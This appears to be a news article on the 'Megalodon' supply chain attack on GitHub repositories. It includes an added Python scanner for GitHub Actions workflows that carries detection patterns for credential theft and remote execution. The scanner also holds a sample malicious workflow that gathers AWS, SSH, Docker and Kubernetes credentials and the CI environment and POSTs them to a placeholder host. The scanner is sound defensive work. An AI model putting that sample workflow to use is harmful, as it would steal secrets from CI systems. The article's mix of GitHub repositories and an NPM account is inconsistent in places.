Massive GitHub Repository Breach Exposes Over 5,500 Organizations to ‘Megalodon’ Malware
Massive Supply Chain Attack Compromises Over 5,500 GitHub Repositories
A sophisticated supply chain attack has exposed over 5,500 GitHub repositories to potential data theft and unauthorized access. The attack, known as Megalodon, leveraged automated commits to inject malicious code into repositories.
- The infected packages were published on GitHub between May 19 and May 21, 2026.
- The malicious commits were pushed to the affected repositories within a six-hour window on May 18, 2026.
- The attackers’ modus operandi involved injecting malicious GitHub Actions workflows that triggered on every push and pull request, acting as backdoors that lay dormant until the next CI run.
- These backdoors enabled the attackers to exfiltrate sensitive information, including:
  - CI environment variables
  - AWS credentials
  - GCP access tokens
  - Azure credentials
  - SSH private keys
  - Docker and Kubernetes configurations
  - API keys
  - Database connection strings
  - GitHub Actions tokens
  - GitLab CI/CD tokens
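The bullets above describe the mechanism only in outline. The following is an added example, written for this page and not code from the article or from any researchers or projects it mentions: a dependency-free scanner that flags GitHub Actions workflow files showing the indicators a credential-stealing workflow of this kind tends to combine (dumping the CI environment, serialising all secrets, reading `~/.aws`, `~/.ssh`, `~/.docker` or `~/.kube`, encoding, and POSTing to a network endpoint). The indicator list, weights and threshold are assumptions made here, not a published signature set, and the two embedded workflows are constructed samples (the collector URL is a placeholder), not files recovered from the incident.

```python
"""Heuristic scanner for GitHub Actions workflows that look like CI-secret
exfiltration backdoors.  Added example; regex-based on raw text so it needs no
YAML library.  Indicators, weights and threshold are assumptions, not a
published signature set."""
import os
import re
from dataclasses import dataclass

# (name, pattern, weight) -- weights are illustrative assumptions.
INDICATORS = [
    # dumps the whole CI environment (AWS_*, GCP/Azure tokens, API keys, ...)
    ("env_dump", re.compile(r"\b(printenv|env\s*\||env\s*>|set\s*\||declare\s+-x)"), 3),
    # serialises every repository secret into a step
    ("secrets_tojson", re.compile(r"toJSON\(\s*secrets\s*\)"), 5),
    # reads well-known credential files from the runner
    ("cred_files", re.compile(r"(~|\$HOME)/\.(aws|ssh|docker|kube|config/gcloud|azure)\b"), 4),
    # encodes data before sending it, typical of exfil staging
    ("encoding", re.compile(r"\b(base64|xxd|openssl\s+enc)\b"), 2),
    # pushes data to a network endpoint
    ("network_post", re.compile(r"\b(curl|wget)\b[^\n]*(-d\b|--data|-X\s*POST|-T\b|--upload-file|--post-data)"), 3),
    # runs code fetched from the internet
    ("remote_exec", re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(ba)?sh\b"), 4),
    # blanket write permissions on the job token
    ("write_all", re.compile(r"permissions:\s*write-all"), 2),
    # pull_request_target runs fork PR code with the base repo's secrets
    ("pr_target", re.compile(r"pull_request_target"), 3),
]


@dataclass
class Finding:
    name: str
    line: int
    excerpt: str


def scan_workflow(text):
    """Return (score, findings) for the text of one workflow file."""
    findings, score = [], 0
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, rx, weight in INDICATORS:
            if rx.search(line):
                findings.append(Finding(name, lineno, line.strip()))
                score += weight
    return score, findings


def is_suspicious(text, threshold=6):
    return scan_workflow(text)[0] >= threshold


def scan_repo(repo_root, threshold=6):
    """Scan .github/workflows/*.y*ml under repo_root; return {path: score} of flagged files."""
    wf_dir = os.path.join(repo_root, ".github", "workflows")
    flagged = {}
    if not os.path.isdir(wf_dir):
        return flagged
    for name in sorted(os.listdir(wf_dir)):
        if name.endswith((".yml", ".yaml")):
            path = os.path.join(wf_dir, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                score, _ = scan_workflow(fh.read())
            if score >= threshold:
                flagged[path] = score
    return flagged


# Constructed sample: an ordinary test workflow (should score 0).
BENIGN_WORKFLOW = """name: CI
on:
  push:
    branches: [main]
  pull_request:
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
        with:
          node-version: 20
      - run: npm ci
      - run: npm test
"""

# Constructed sample of the pattern described in the article; the collector
# host is a placeholder, not an indicator from the incident.
MALICIOUS_WORKFLOW = """name: Build
on: [push, pull_request]
permissions: write-all
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Prepare cache
        env:
          ALL: ${{ toJSON(secrets) }}
        run: |
          tar czf /tmp/c.tgz ~/.aws ~/.ssh ~/.docker/config.json ~/.kube/config 2>/dev/null || true
          env | base64 -w0 > /tmp/e.b64
          curl -s -X POST --data-binary @/tmp/e.b64 https://collector.example/upload
"""

if __name__ == "__main__":
    for label, wf in (("benign", BENIGN_WORKFLOW), ("malicious", MALICIOUS_WORKFLOW)):
        score, findings = scan_workflow(wf)
        print(f"{label}: score={score} suspicious={is_suspicious(wf)}")
        for f in findings:
            print(f"  L{f.line} {f.name}: {f.excerpt}")
```

Run `scan_repo(".")` from a checkout to triage every workflow at once. The scoring is deliberately cumulative: a lone `curl` or `base64` is routine in CI, but a single file that reads credential files, encodes them and POSTs them crosses the threshold, which is what distinguishes an exfiltration step from a build step. Treat a hit as a prompt for manual review, and pair it with branch-protection rules and required review on `.github/workflows/` so a pushed commit cannot silently add a workflow in the first place.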
All of the compromised packages were published from the same NPM account, ‘eljohnny’, with no visible changes to the account itself.
This incident highlights the importance of vigilance in monitoring third-party dependencies and ensuring that all updates are thoroughly reviewed before deployment.
Researchers warn that if platforms continue to allow unvetted code uploads, the number of attacks will only increase.
In response to this breach, several major companies have begun revoking NPM granular access tokens that carry write access and bypass two-factor authentication. The aim is to limit the damage a compromised account can do and so reduce the impact of future attacks of this kind.